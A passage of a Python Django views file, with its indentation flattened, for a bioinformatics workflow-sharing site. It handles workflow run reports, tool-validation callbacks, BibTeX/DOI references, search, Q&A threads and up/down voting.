# Check data_from_client. We expect to find an externally triggered True in data_from_client['status']['message']
if not 'status' in data_from_client:
return fail('Client does not contains status info')
if not 'message' in data_from_client['status']:
return fail("Client's status does not contain any message")
if not 'externally triggered: True' in data_from_client['status']['message']:
return fail("Client failed to trigger DAG: {}".format(data_from_client['status']['message']))
if not 'executor_url' in data_from_client:
return fail("Could not get workflow monitoring URL..")
visualization_url = g['create_client_airflow_url'](data_from_client['executor_url'], nice_id)
if not 'monitor_url' in data_from_client:
return fail('Could not get monitoring URL..')
monitor_url = data_from_client['monitor_url']
# All seem to be ok. Create a report
report = Report(
obc_user=obc_user,
workflow = workflow,
nice_id = nice_id,
client=client,
visualization_url=visualization_url,
monitor_url = monitor_url,
client_status='SUBMITTED')
report.save()
# Let's not create a reporttoken for now.
ret = {
'nice_id': nice_id,
}
return success(ret)
@csrf_exempt
@has_data
def report(request, **kwargs):
'''
called from executor
'''
#print (kwargs)
token = kwargs.get('token', None)
if not token:
return fail('Could not find token field')
#print ('token: {}'.format(token))
if not uuid_is_valid(token):
return fail('bad token format')
status_received = kwargs.get('status', None)
if not status_received:
return fail('Could not find status field')
status_fields = ReportToken.parse_response_status(status_received)
#if not status_received in ReportToken.STATUS_CHOICES:
if status_fields is None:
return fail('Unknown status: {}'.format(status_received))
#Get the ReportToken
try:
old_report_token = ReportToken.objects.get(token=token)
except ObjectDoesNotExist as e:
return fail('Could not find entry to this token')
if not old_report_token.active:
return fail('This token has expired')
# Deactivate it
old_report_token.active = False
old_report_token.save()
# Get the report
report_obj = old_report_token.report_related.first()
# Save the new status and return a new token
new_report_token = ReportToken(status=status_received, active=True) # Duplicate code
new_report_token.save()
report_obj.tokens.add(new_report_token)
report_obj.save()
#print ('OLD STATUS:', old_report_token.status)
#print ('NEW STATUS:', new_report_token.status)
return success({'token': str(new_report_token.token)})
### END OF WORKFLOWS ###
### START OF VALIDATION CALLBACK ###
@has_data
def tool_validation_status(request, **kwargs):
'''
Called from the refresh button on Tool validation
'''
tool_argument = kwargs['tool']
tool = Tool.objects.get(**tool_argument)
# toolvalidations = ToolValidations.get()
#print ('TOOL VALIDATION STATUS:')
ret = {
'validation_status': tool.last_validation.validation_status if tool.last_validation else 'Unvalidated',
'validation_created_at': datetime_to_str(tool.last_validation.created_at) if tool.last_validation else None,
'stderr':tool.last_validation.stderr if tool.last_validation else None,
'stdout':tool.last_validation.stdout if tool.last_validation else None,
'errcode':tool.last_validation.errcode if tool.last_validation else None,
}
#print (ret)
return success(ret)
@has_data
def tool_info_validation_queued(request, **kwargs):
'''
This is called from angular in order to connect the controller id with the database tool
'''
if not 'payload' in kwargs:
return fail('payload was not found on callback')
payload = kwargs['payload']
assert payload['status'] == 'Queued'
tool = Tool.objects.get(**payload['tool'])
this_id = payload['id']
tv = ToolValidations(tool=tool, task_id=this_id, validation_status='Queued')
tv.save()
#print (f'Saved ToolValidation Queued with task_id: {this_id}')
tool.last_validation = tv
tool.save()
return success({'last_validation': datetime_to_str(tv.created_at)})
@csrf_exempt
@has_data
def callback(request, **kwargs):
'''
Funtion called by conntroller.py
'''
#print("--------------- REQUEST FROM CONTROLLER ------------------")
#print(kwargs)
remote_address = request.META['REMOTE_ADDR']
#print (f'Callback from: {remote_address}')
if not remote_address in ['139.91.190.79']:
return fail(f'Received callback from unknown remote address: {remote_address}')
if not 'payload' in kwargs:
return fail('payload was not found on callback')
payload = kwargs['payload']
if not 'status' in payload:
return fail('status was not found on payload')
status = payload['status']
if not status in ['Running', 'Validated', 'Failed']:
return fail(f'Unknown status: {status}')
if not 'id' in payload:
return fail('id was not found on payload')
this_id = payload['id']
# Get the stdout stdderr and errorcode
stdout = payload.get('stdout', None)
stderr = payload.get('stderr', None)
errcode = payload.get('errcode', None)
#print(stdout)
# Get the tool referring to this task_id
tool = ToolValidations.get_tool_from_task_id(this_id)
if tool is None:
return fail(f'Could not find tool with task_id={this_id}')
# Create new ToolValidations
# If stdout is emty , stderr and errcode are empty
# If status is Queued or Running set this three None
tv = ToolValidations(tool=tool, task_id=this_id, validation_status=status, stdout= stdout, stderr= stderr, errcode= errcode)
tv.save()
#print (f'CALLBACK: Tool: {tool.name}/{tool.version}/{tool.edit} id: {this_id} status: {status}')
# Assign tv to tool
tool.last_validation = tv
tool.save()
#print (f'CALLBACK: Tool: {tool.name}/{tool.version}/{tool.edit} id: {this_id} status: {status}')
return success()
def tools_show_stdout(request, tools_info_name, tools_info_version, tools_info_edit):
'''
URL :
path(r'tool_stdout/[\\w]+/[\\w\\.]+/[\\d]+/', views.tools_show_stdout), # Show stdout of tool
'''
#print (tools_info_name, tools_info_version, tools_info_edit)
tool_repr = Tool.get_repr(tools_info_name, tools_info_version, tools_info_edit)
try:
tool = Tool.objects.get(name=tools_info_name, version=tools_info_version, edit=int(tools_info_edit))
except ObjectDoesNotExist as e:
return fail(f'Could not find tool: {tool_repr}')
if not tool.last_validation:
return fail(f'Could not find any validation effort for tool: {tool_repr}')
if not tool.last_validation.stdout:
return fail(f'Coud not find stdout on the lst validation efoort of tool: {tool_repr}')
context = {
'html': convert_ansi_to_html(tool.last_validation.stdout)
}
return render(request, 'app/tool_stdout.html', context)
### END OF CALL BACK ###
### REPORTS
def reports_search_2(main_search, request):
'''
Collect all reports from main search.
In contrary to other *_search_2 , we only allow to show reports that belong to the login user!
'''
# Return empty results if user is anonymous or not validated
if request.user.is_anonymous or (not user_is_validated(request)):
return {
'main_search_reports_number': 0,
'reports_search_jstree': [],
}
obc_user = OBC_user.objects.get(user=request.user)
nice_id_Q = Q(nice_id__contains=main_search)
username_Q = Q(obc_user__user__username__icontains=main_search)
workflow_Q = Q(workflow__name__icontains=main_search)
not_unused = Q(tokens__status = ReportToken.UNUSED)
count_1 = Q(num_tokens = 1)
user_Q = Q(obc_user = obc_user)
# We do not want reports that have only one tokens which is "unused"
results = Report.objects.annotate(num_tokens=Count('tokens')).filter(
user_Q & (nice_id_Q | workflow_Q | username_Q) & (~(not_unused&count_1))
)
# BUILD TREE
reports_search_jstree = []
workflows_in_tree = set()
for report in results:
# Add the workflow
workflow = report.workflow
if not workflow in workflows_in_tree:
workflows_in_tree.add(workflow)
to_add = {
'data': {'name': workflow.name, 'edit': workflow.edit, 'type': 'workflow'},
'text': workflow_text_jstree(workflow) + jstree_icon_html('workflows'),
'id': workflow_id_jstree(workflow, g['SEARCH_REPORT_TREE_ID']),
'parent': workflow_id_jstree(workflow.forked_from, g['SEARCH_REPORT_TREE_ID']) if workflow.forked_from else '#',
'state': { 'opened': True},
}
reports_search_jstree.append(to_add)
# Add the report
to_add = {
'data': {'run': report.nice_id, 'type': 'report'},
'text': report.nice_id + jstree_icon_html('reports'),
'id': report_id_jstree(report, g['SEARCH_REPORT_TREE_ID']),
'parent': workflow_id_jstree(workflow, g['SEARCH_REPORT_TREE_ID']),
'state': { 'opened': True},
}
reports_search_jstree.append(to_add)
ret = {
'main_search_reports_number': results.count(),
'reports_search_jstree': reports_search_jstree,
}
return ret
@has_data
def reports_search_3(request, **kwargs):
'''
Search for an individual report
'''
if request.user.is_anonymous or (not user_is_validated(request)):
return fail('You are either anonymous or your email is not validated. You do not have access to reports.')
obc_user = OBC_user.objects.get(user=request.user)
run = kwargs['run']
try:
report = Report.objects.get(nice_id=run, obc_user=obc_user)
except ObjectDoesNotExist as e:
return fail('Could not find report, or you do not have access.')
workflow = report.workflow
#Get all tokens
tokens = [{
'status': token.status,
'created_at': datetime_to_str(token.created_at),
'token': str(token.token),
#'node_anim_id': create_node_anim_id(token.status), # the parameter passed to nodeAnimation
'node_anim_params': ReportToken.parse_response_status(token.status), # the parameter passed to nodeAnimation_public
} for token in report.tokens.all().order_by('created_at') if token.status != ReportToken.UNUSED]
# Check if ReportToken.parse_response_status successfully parsed tokens
# This is a sanity check
for token in tokens:
if token['node_anim_params'] is None:
return fail('Error 8915: could not parse token: {}'.format(token['status']))
ret = {
'report_workflow_name': workflow.name,
'report_workflow_edit': workflow.edit,
'report_username': report.obc_user.user.username,
'report_created_at': datetime_to_str(report.created_at),
'report_tokens': tokens,
'report_client': bool(report.client),
'report_url': report.url, # The url with the results
'report_log_url': report.log_url, # The url with the logs
'report_visualization_url': report.visualization_url, # The url for monitoring of the execution progress (i.e. from airflow)
'report_monitor_url': report.monitor_url,
'report_client_status': report.client_status,
'workflow' : simplejson.loads(workflow.workflow),
}
return success(ret)
@has_data
def reports_refresh(request, **kwargs):
'''
path: report_refresh/
Get an update for a report
report_workflow_action : 1 = refresh , 2 = pause , 3 = resume
'''
report_workflow_name = kwargs['report_workflow_name']
report_workflow_edit = int(kwargs['report_workflow_edit'])
nice_id = kwargs['report_workflow_run']
report_workflow_action = kwargs['report_workflow_action']
# Get the report
report = Report.objects.get(nice_id=nice_id)
previous_status = report.client_status
if request.user.is_anonymous:
return fail('Please log in to update the status of a Report')
# Get this user
obc_user = OBC_user.objects.get(user=request.user)
if obc_user != report.obc_user:
return fail('Cannot edit a report of another user.')
if not report.client:
if report_workflow_action == 4:
# Deleting a report that has not been associated with any client.
# Just delete it..
report.delete()
return success()
# Get the url of the client
client_url = report.client.client
if report_workflow_action == 1:
# Refresh
# Get the url to check status
url = g['create_client_check_status_url'](client_url, nice_id)
#print ('CHECK STATUS URL:')
#print (url)
elif report_workflow_action == 2:
# Pause
url = g['create_client_pause_url'](client_url, nice_id)
#print ('PAUSE URL:')
#print (url)
elif report_workflow_action == 3:
# Resume
url = g['create_client_resume_url'](client_url, nice_id)
#print ('RESUME URL:')
#print (url)
elif report_workflow_action == 4:
# Delete
url = g['create_client_abort_url'](client_url, nice_id)
#print ('ABORT URL:')
#print (url)
else:
return fail('Error 5821: {}'.format(str(report_workflow_action)))
try:
r = requests.get(url)
except requests.exceptions.ConnectionError as e:
return fail('Could not establish a connection with client')
if not r.ok:
return fail('Could not send to URL: {} . Error code: {}'.format(client_url, r.status_code))
data_from_client = r.json()
#print ('Data from client:')
#print (data_from_client)
# {"error": "Dag id mitsos not found"}
if report_workflow_action == 1: # refresh
if type(data_from_client) is dict:
if 'error' in data_from_client:
if 'not found' in data_from_client['error']:
status = 'NOT FOUND'
else:
return fail('Error: 1111')
else:
return fail('Error: 1112')
if not type(data_from_client) is list:
return fail('Error: 1113')
if len(data_from_client) != 1:
return fail('Error: 1114')
if not type(data_from_client[0]) is dict:
return fail('Error: 1115')
if not 'state' in data_from_client[0]:
return fail('Error: 1116')
if data_from_client[0]['state'] == 'running':
status = 'RUNNING'
elif data_from_client[0]['state'] == 'failed':
status = 'FAILED'
elif data_from_client[0]['state'] == 'success':
status = 'SUCCESS'
elif data_from_client[0]['state'] == 'paused':
status = 'PAUSED'
else:
return fail('Unknown status:', data_from_client[0]['state'])
elif report_workflow_action in [2, 3]: # 2 = pause , 3 = resume
if not type(data_from_client) is dict:
return fail('Error: 1119')
if not 'response' in data_from_client:
return fail('Error: 1120')
if data_from_client['response'] != 'ok':
return fail('Error 1121')
if report_workflow_action == 2:
status = 'PAUSE_SUBMITTED'
elif report_workflow_action == 3:
status = 'RESUME_SUBMITTED'
else:
return fail('Error 1122')
elif report_workflow_action == 4:
if not type(data_from_client) is dict:
return fail('Error: 1123')
if not 'status' in data_from_client:
return fail('Error 1124')
if data_from_client['status'] != 'success':
return fail('Client responded with an error message: {}'.format(data_from_client['status']))
# Delete it..
report.delete()
return success()
# Update report object
report.client_status = status
report.save()
# If we finished, then create the URL that contains the report
report_url = None
log_url = None
if status == 'SUCCESS':
report_url = g['create_client_download_report_url'](client_url, nice_id)
if status in ['SUCCESS', 'FAILED']:
log_url = g['create_client_download_log_url'](client_url, nice_id)
report.url = report_url
report.log_url = log_url
report.save()
ret = {
'report_url': report_url,
'report_log_url': log_url,
'report_client_status': status,
}
return success(ret)
### END OF REPORTS
### REFERENCES
def bibtex_to_html(content):
'''
Convert bibtex to html
Adapted from: http://pybtex-docutils.readthedocs.io/en/latest/quickstart.html#overview
'''
# Ideally we could have these variables set only once,
# But it is not allowed to have multiuple entries.
pybtex_style = pybtex.plugin.find_plugin('pybtex.style.formatting', 'plain')()
pybtex_html_backend = pybtex.plugin.find_plugin('pybtex.backends', 'html')()
pybtex_parser = pybtex.database.input.bibtex.Parser()
try:
data = pybtex_parser.parse_stream(six.StringIO(content))
except pybtex.scanner.TokenRequired as e:
return False, 'Error during parsing BIBTEX: ' + str(e), None
if len(data.entries) == 0:
return False, 'Could not find any BIBTEX entry', None
if len(data.entries) > 1:
return False, 'Detected more than one entries in BIBTEX. Only one is allowed', None
fields = {}
for entry_key, entry_value in data.entries.items():
fields[entry_key] = {}
for field_key, field_value in entry_value.fields.items():
fields[entry_key][field_key] = field_value
data_formatted = pybtex_style.format_entries(six.itervalues(data.entries))
output = io.StringIO()
try:
pybtex_html_backend.write_to_stream(data_formatted, output)
except pybtex.style.template.FieldIsMissing as e:
return False, str(e), None # This DOI for example: 10.1038/nature09298 . Error: missing author in 2010.
html = output.getvalue()
html_s = html.split('\n')
html_s = html_s[9:-2]
new_html = '\n'.join(html_s).replace('<dd>', '').replace('</dd>', '')
return True, new_html, fields
def get_fields_from_bibtex_fields(fields, str_response):
'''
Reads fields from a bibtex formated in html
TEST 1
@article{Barrangou_2007,
doi = {10.1126/science.1138140},
url = {https://doi.org/10.1126%2Fscience.1138140},
year = 2007,
month = {mar},
publisher = {American Association for the Advancement of Science ({AAAS})},
volume = {315},
number = {5819},
pages = {1709--1712},
author = {R. Barrangou and C. Fremaux and H. Deveau and M. Richards and P. Boyaval and S. Moineau and D. A. Romero and P. Horvath},
title = {{CRISPR} Provides Acquired Resistance Against Viruses in Prokaryotes},
journal = {Science}
}
'''
name = list(fields.keys())[0] # first key
title = fields[name].get('title', '')
# check if it is enclised in brackets {title}
# Remove '{' and '}' from tite
#m = re.match(r'{(.*)}', title)
#if m:
# title = m.group(1)
title = title.replace('{', '').replace('}', '')
doi = fields[name].get('doi', '')
if not doi:
doi = fields[name].get('DOI', '')
url = fields[name].get('url', '')
if not url:
url = fields[name].get('URL', '')
ret = {
'references_name': name,
'references_formatted': str_response,
'references_title': title,
'references_doi': doi,
'references_url': url,
}
return ret
@has_data
def references_generate(request, **kwargs):
'''
Generate HTML reference from bibtex
'''
references_BIBTEX = kwargs['references_BIBTEX']
suc, str_response, fields = bibtex_to_html(references_BIBTEX)
if not suc:
return fail(str_response)
ret = get_fields_from_bibtex_fields(fields, str_response)
return success(ret)
@has_data
def references_process_doi(request, **kwargs):
'''
Generate a BIBTEX from DOI
'''
references_doi = kwargs.get('references_doi', '')
if not references_doi:
return fail('DOI is empty')
doi_url = "http://dx.doi.org/" + references_doi
if not valid_url(doi_url):
return fail('Invalid DOI. Example of valid DOI: 10.1126/science.1138140')
bibtex = resolve_doi(references_doi)
#print ('bibtex:')
#print (bibtex)
if not bibtex:
return fail('Could not get bibliographic information for this DOI')
suc, str_response, fields = bibtex_to_html(bibtex)
if not suc:
return fail('The BIBTEX returned from this doi was invalid: ' + str_response) # This should never happen..
ret = get_fields_from_bibtex_fields(fields, str_response)
ret['references_BIBTEX'] = bibtex
return success(ret)
@has_data
def references_add(request, **kwargs):
'''
Add a new reference
'''
# Check user
if request.user.is_anonymous:
return fail('Please login to create References')
# Check if user is validated
if not user_is_validated(request):
return fail('Please validate your email to create new references ' + validate_toast_button());
references_name = kwargs.get('references_name', '')
if not references_name:
return fail('References Name is required')
if not re.match(r'\w+', references_name):
return fail('Invalid Reference Name. It should contain only letters and numbers')
references_title = kwargs.get('references_title', '')
if not references_title:
return fail('References Title is required')
references_url = kwargs.get('references_url', '')
if not references_url:
return fail('References URL is required')
#Is there a reference with the same url?
url_ref = Reference.objects.filter(url=references_url)
if url_ref.exists():
return fail('A Reference with this URL already exists: {}'.format(url_ref.first().name))
# References are case insensitive!
references_name = references_name.lower()
#Are there any references with this name?
if Reference.objects.filter(name=references_name).exists():
return fail('A Reference with this name already exists')
# Is there a reference with the same SOI?
references_doi = kwargs.get('references_doi', None)
if references_doi:
doi_ref = Reference.objects.filter(doi=references_doi)
if doi_ref.exists():
return fail('A Reference with this DOI already exists: {}'.format(doi_ref.first().name))
# Check bibtex
references_BIBTEX = kwargs.get('references_BIBTEX', '')
reference_fields = []
html = None
if references_BIBTEX:
suc, str_response, fields = bibtex_to_html(references_BIBTEX)
if not suc:
return fail(str_response)
# It succeeded to parse BIBTEX. Get the html
html = str_response
name = list(fields.keys())[0] # first key
#Create (or get) ReferenceFields
reference_fields = [ReferenceField.objects.get_or_create(
key=reference_key,
value=reference_value,
)[0] for reference_key, reference_value in fields[name].items()]
# Create Reference object
reference = Reference(
obc_user = OBC_user.objects.get(user=request.user),
name = references_name,
url = references_url,
title = references_title,
doi = references_doi,
bibtex = references_BIBTEX if references_BIBTEX else None,
html = html,
notes = kwargs.get('references_notes', None),
)
reference.save()
# Add fields from BIBTEX
reference.fields.add(*reference_fields)
reference.save()
ret = {
'references_formatted': html,
'references_created_at': datetime_to_str(reference.created_at),
'references_username': request.user.username,
}
return success(ret)
def references_search_2(
main_search,
):
'''
Collect all references from main search
'''
name_Q = Q(name__icontains=main_search)
html_Q = Q(html__icontains=main_search)
username_Q = Q(obc_user__user__username__icontains=main_search)
results = Reference.objects.filter(name_Q | html_Q | username_Q)
references_search_jstree = []
for result in results:
to_add = {
'data': {'name': result.name},
'text': result.name + jstree_icon_html('references'),
'id': result.name,
'parent': '#',
'state': { 'opened': True},
}
references_search_jstree.append(to_add)
ret = {
'main_search_references_number': results.count(),
'references_search_jstree': references_search_jstree,
}
return ret
def qa_get_root_comment(comment):
'''
Take a comment in a nested thread and get the root comment
'''
if not comment.parent:
return comment
return qa_get_root_comment(comment.parent)
def qa_search_2(main_search):
'''
Collect all Q&A from main search
'''
title_Q = Q(title__icontains=main_search)
comment_Q = Q(comment__icontains=main_search)
username_Q = Q(obc_user__user__username__icontains=main_search)
results = Comment.objects.filter(title_Q | comment_Q | username_Q)
qa_search_tree = []
entries_in_tree = set()
for result in results:
# Get the root message
result_parent = qa_get_root_comment(result)
#Is this on the tree?
if result_parent.pk in entries_in_tree:
# It is already in the tree
continue
else:
entries_in_tree.add(result_parent.pk)
# Remove <a></a> hyperlinks from question answers
# See issue #106
if re.search(r'<a.*a>', result_parent.title):
to_substitute = re.search(r'<a.*a>', result_parent.title).group(0)
substitute_with = re.search(r'>(.*)</a>', re.search(r'<a.*a>', result_parent.title).group(0)).group(1)
result_parent.title = result_parent.title.replace(to_substitute, substitute_with)
to_add = {
'data': {'id': result_parent.pk},
'text': result_parent.title + jstree_icon_html('qas'),
'id': str(result_parent.pk),
'parent': '#',
'state': { 'opened': True},
}
qa_search_tree.append(to_add)
ret = {
'main_search_qa_number': len(qa_search_tree),
'qa_search_jstree': qa_search_tree,
}
return ret
@has_data
def references_search_3(request, **kwargs):
'''
'''
name = kwargs.get('name', '')
try:
reference = Reference.objects.get(name__iexact=name)
except ObjectDoesNotExist as e:
return fail('Could not find Reference') # This should never happen..
ret = {
'references_name': reference.name,
'references_title': reference.title,
'references_url': reference.url,
'references_doi': reference.doi,
'references_notes': reference.notes,
'references_BIBTEX': reference.bibtex,
'references_html': reference.html,
'references_created_at': datetime_to_str(reference.created_at),
'references_username': reference.obc_user.user.username,
}
return success(ret)
### END OF REFERENCES
### SEARCH
@has_data
def all_search_2(request, **kwargs):
'''
Called when there is a key change in main search
'''
main_search = kwargs.get('main_search', '')
main_search_slash_count = main_search.count('/')
# Check for slashes
if main_search_slash_count == 0:
tools_search_name = main_search
tools_search_version = ''
tools_search_edit = ''
workflows_search_name = main_search
workflows_search_edit = ''
elif main_search_slash_count == 1:
tools_search_name, tools_search_version = main_search.split('/')
tools_search_name = tools_search_name.strip()
tools_search_version = tools_search_version.strip()
tools_search_edit = 0 # Do not apply search
workflows_search_name, workflows_search_edit = main_search.split('/')
workflows_search_name = workflows_search_name.strip()
workflows_search_edit = workflows_search_edit.strip()
try:
workflows_search_edit = int(workflows_search_edit)
except ValueError:
workflows_search_edit = 0 # do not apply search on workflow edit
elif main_search_slash_count == 2:
# Practically apply only tool search
tools_search_name, tools_search_version, tools_search_edit = main_search.split('/')
tools_search_name = tools_search_name.strip()
tools_search_version = tools_search_version.strip()
try:
tools_search_edit = int(tools_search_edit)
except ValueError:
tools_search_edit = 0 # Do not apply search no tool edit
workflows_search_name = ''
workflows_search_edit = -1
else:
tools_search_name = ''
tools_search_version = ''
tools_search_edit = -1
workflows_search_name = ''
workflows_search_edit = -1
ret = {}
#Get tools
for key, value in tools_search_2(tools_search_name, tools_search_version, tools_search_edit).items():
ret[key] = value
#Get workflows
for key, value in workflows_search_2(workflows_search_name, workflows_search_edit).items():
ret[key] = value
#Get reports
for key, value in reports_search_2(main_search, request).items():
ret[key] = value
#Get references
for key, value in references_search_2(main_search).items():
ret[key] = value
#Get users
for key, value in users_search_2(main_search).items():
ret[key] = value
# Get QAs
for key, value in qa_search_2(main_search).items():
ret[key] = value
return success(ret)
### END OF SEARCH
### Q&A
@has_data
def qa_add_1(request, **kwargs):
'''
Called from qa_add_1/
'''
qa_title = kwargs.get('qa_title', '')
if not qa_title:
return fail('Title should not be empty')
qa_comment = kwargs.get('qa_comment', '')
if not qa_comment:
return fail('Comment should not be empty')
qa_comment_html = markdown(qa_comment)
if request.user.is_anonymous:
return fail('Please login to post a new question')
user = request.user
# We cannot have the same comment title more than once
if Comment.objects.filter(title__iexact=qa_title).exists():
return fail('A comment with this title already exists!')
#Create a new comment
comment = Comment(
obc_user=OBC_user.objects.get(user=user),
comment=qa_comment,
comment_html = qa_comment_html,
title=qa_title,
parent=None,
upvotes=0,
downvotes=0,
)
comment.save()
ret = {
'id': comment.pk,
'comment_html': qa_comment_html,
}
return success(ret)
def qa_create_thread(comment, obc_user = None):
'''
Recursive
Create the children thread of a comment
'''
ret = []
for child in comment.children.all():
to_add = {
'comment': child.comment,
'comment_html': child.comment_html,
'opinion': child.opinion,
'score': child.upvotes - child.downvotes,
'id': child.pk,
'replying': False,
'voted' : is_comment_updownvoted(obc_user, child),
'children': qa_create_thread(child, obc_user),
'username': child.obc_user.user.username,
'created_at': datetime_to_str(child.created_at),
}
ret.append(to_add)
return ret
@has_data
def qa_search_3(request, **kwargs):
'''
path: qa_search_3/
From angular: Fetch the data from a single Q&A and update the UI
Get a unique Q&A thread
'''
id_ = kwargs.get('qa_id', None)
if not id_:
return fail('Could not find Q&A id')
try:
comment = Comment.objects.get(pk=id_)
except ObjectDoesNotExist as e:
return fail('Could not find comment database object')
# Get obc_user
if request.user.is_anonymous:
obc_user = None
else:
obc_user = OBC_user.objects.get(user=request.user)
ret = {
'qa_title': comment.title,
'qa_comment': comment.comment,
'qa_comment_html': comment.comment_html,
'qa_score': comment.upvotes - comment.downvotes,
'qa_id': comment.pk,
'qa_thread': qa_create_thread(comment, obc_user),
'qa_voted': is_comment_updownvoted(obc_user, comment),
'qa_username': comment.obc_user.user.username,
'qa_created_at': datetime_to_str(comment.created_at),
}
#print (simplejson.dumps(ret, indent=4))
return success(ret)
@has_data
def get_pk_from_root_comment(request, **kwargs):
'''
path: get_pk_from_root_comment/
'''
comment_id = int(kwargs['comment_id'])
pk_type = kwargs['type']
try:
if pk_type == 'tool':
tool = Tool.objects.filter(comment_id=comment_id).first()
pk = tool.id
elif pk_type == 'workflow':
workflow = Workflow.objects.filter(comment_id=comment_id).first()
pk = workflow.id
else:
return fail('ERROR: 2919 . Unknown pk_type: {}'.format(pk_type))
except ObjectDoesNotExist as e:
return fail('Could not find tool or workflow database object')
ret = {
'pk': pk,
}
return success(ret)
@has_data
def gen_qa_search_3(request, **kwargs):
'''
PATH: gen_qa_search_3/
Generic version of qa_search_3
Get a unique Q&A thread
'''
# Get arguments
object_pk = kwargs['object_pk'] # This is the primary key of the tool/workflow
qa_type = kwargs['qa_type']
if qa_type == 'tool':
commentable = Tool.objects.get(pk=object_pk)
elif qa_type == 'workflow':
commentable = Workflow.objects.get(pk=object_pk)
else:
return fail('ERROR: 2918 . Unknown qa_type: {}'.format(qa_type))
# Get obc_user
if request.user.is_anonymous:
obc_user = None
else:
obc_user = OBC_user.objects.get(user=request.user)
# Get the thread of this comment
ret = {
'qa_id': commentable.comment.pk,
'qa_thread': qa_create_thread(commentable.comment, obc_user),
'qa_voted': is_comment_updownvoted(obc_user, commentable.comment),
'qa_score': commentable.comment.upvotes - commentable.comment.downvotes,
'qa_username': commentable.comment.obc_user.user.username,
'qa_created_at': datetime_to_str(commentable.comment.created_at),
}
return success(ret)
@has_data
def qa_add_comment(request, **kwargs):
'''
Add a comment at a Q&A question
'''
if request.user.is_anonymous:
return fail('Please login to add a new comment')
if not user_is_validated(request):
return fail('Please validate your email to add a new comment' + validate_toast_button());
id_ = kwargs.get('qa_id', None)
if id_ is None:
return fail('Could not find Q&A id')
current_comment = kwargs.get('qa_comment', None)
if current_comment is None:
return fail('Could not find Q&A new comment')
elif not current_comment.strip():
return fail('Comment cannot be empty')
current_comment_html = markdown(current_comment)
opinion = kwargs.get('qa_opinion', None)
if not opinion in ['solution', 'note', 'agree', 'disagree']:
return fail('Error 9177. opinion value unknown')
try:
parent_comment = Comment.objects.get(pk=id_)
except ObjectDoesNotExist as e:
return fail('ERROR: 8991. Could not find comment database object')
new_comment = Comment(
obc_user = OBC_user.objects.get(user=request.user),
comment = current_comment,
comment_html = current_comment_html,
opinion = opinion,
parent = parent_comment,
upvotes = 0,
downvotes = 0,
)
new_comment.save()
parent_comment.children.add(new_comment)
parent_comment.save()
ret = {
'comment_html': current_comment_html,
}
return success(ret)
@has_data
def gen_qa_add_comment(request, **kwargs):
'''
PATH: gen_qa_add_comment/
Generic version of the qa_add_comment
Add a comment at a Q&A question
'''
if request.user.is_anonymous:
return fail('Please login to add a new comment')
if not user_is_validated(request):
return fail('Please validate your email to add a new comment ' + validate_toast_button());
comment_pk = kwargs['comment_pk']
object_pk = kwargs['object_pk']
qa_comment = kwargs['qa_comment']
qa_opinion = kwargs['qa_opinion']
qa_type = kwargs['qa_type']
current_comment_html = markdown(qa_comment)
# Get the tool
if qa_type == 'tool':
commentable = Tool.objects.get(pk=object_pk)
elif qa_type == 'workflow':
commentable = Workflow.objects.get(pk=object_pk)
else:
return fail('ERROR: 2918 . Unknown qa_type: {}'.format(qa_type))
# Get the root comment
if comment_pk is None:
root_comment = commentable.comment
else:
root_comment = Comment.objects.get(pk=comment_pk)
new_comment = Comment(
obc_user=OBC_user.objects.get(user=request.user),
comment = qa_comment,
opinion = qa_opinion,
comment_html = current_comment_html,
parent = root_comment,
upvotes = 0,
downvotes = 0,
)
new_comment.save()
root_comment.children.add(new_comment)
root_comment.save()
ret = {
'comment_html': current_comment_html,
}
return success(ret)
def is_comment_updownvoted(obc_user, comment):
'''
Has this user upvoted or downvoted this comment?
'''
if obc_user is None:
return {'up': False, 'down': False}
try:
vote = UpDownCommentVote.objects.get(obc_user=obc_user, comment=comment)
except ObjectDoesNotExist as e:
return {'up': False, 'down': False}
return {'up': vote.upvote, 'down': not vote.upvote}
@has_data
def updownvote_comment(request, **kwargs):
'''
url: updownvote_comment/
'''
if request.user.is_anonymous:
return fail('Please login to upvote/downvote comments')
if not user_is_validated(request):
return fail('Please validate your email to upvote/downvote' + validate_toast_button());
comment_id = int(kwargs['comment_id'])
upvote = kwargs['upvote']
assert upvote in [True, False]
# Get the comment
comment = Comment.objects.get(pk=comment_id)
# Get the user
obc_user = OBC_user.objects.get(user=request.user)
# Check if this is already a vote
try:
vote = UpDownCommentVote.objects.get(obc_user=obc_user, comment=comment)
except ObjectDoesNotExist as e:
#Create the UpDownCommentVote object
vote = UpDownCommentVote(
obc_user = obc_user,
comment = comment,
upvote = upvote,
)
vote.save()
voted = {'up': upvote, 'down': not upvote}
else:
# No exception happened. A vote for this comment already exists
if vote.upvote and upvote:
# You cannot upvote twice!
return fail('Already upvoted')
if (not vote.upvote) and (not upvote): # DeMorgan anyone?
# You cannot downvote twice!
return fail('Already downvoted')
# This post was upvoted and now downvoted from the same user (or vice-versa)!
# Just delete the vote
vote.delete()
voted = {'up': False, 'down': False} # Neither upvoted nor downvoted
#Add the score
if upvote:
comment.upvotes += 1
else:
comment.downvotes += 1
comment.save()
ret = {
'score': comment.upvotes - comment.downvotes,
'voted': voted
}
return success(ret)
@has_data
def updownvote_tool_workflow(request, **kwargs):
'''
Called from $scope.updownvote_tool_workflow
Called when a user hit the buttons for upvote or downvote or a tool or for a workflow
'''
if request.user.is_anonymous:
return fail('Please login to upvote/downvote Research Objects')
if not user_is_validated(request):
return fail('Please validate your email to upvote/downvote' + validate_toast_button());
# Get the user
obc_user = OBC_user.objects.get(user=request.user)
ro = kwargs.get('ro', '')
if not ro:
return fail('Error 1023')
if not ro in ['tool', 'workflow']:
return fail('Error 1026')
ro_obj = kwargs.get('ro_obj', '')
if not ro_obj:
return fail('Error 1024')
upvote = kwargs.get('upvote', '')
if upvote == '':
return fail('Error 1025')
if not upvote in [True, False]:
return fail('Error 1027')
# Get the tool/workflow database object
ro_table = {
'tool': Tool,
'workflow': Workflow,
}[ro]
ro_ud_table = {
'tool': UpDownToolVote,
'workflow': UpDownWorkflowVote,
}[ro]
try:
ro_table_obj = ro_table.objects.get(**ro_obj)
except ObjectDoesNotExist as e:
return fail('Error 1027')
# Check if this user has already upvoted or downvoted this RO
try:
ro_ud_table_obj = ro_ud_table.objects.get(**{
'obc_user': obc_user,
ro: ro_table_obj,
})
except ObjectDoesNotExist as e:
# This user has **not** upvoted or downvoted this RO
pass
else:
# This user has upvoted or downvoted this RO in the past
if ro_ud_table_obj.upvote and upvote:
return fail('You cannot upvote twice')
elif (not ro_ud_table_obj.upvote) and (not upvote):
return fail('You cannot downvote twice')
elif ro_ud_table_obj.upvote and (not upvote):
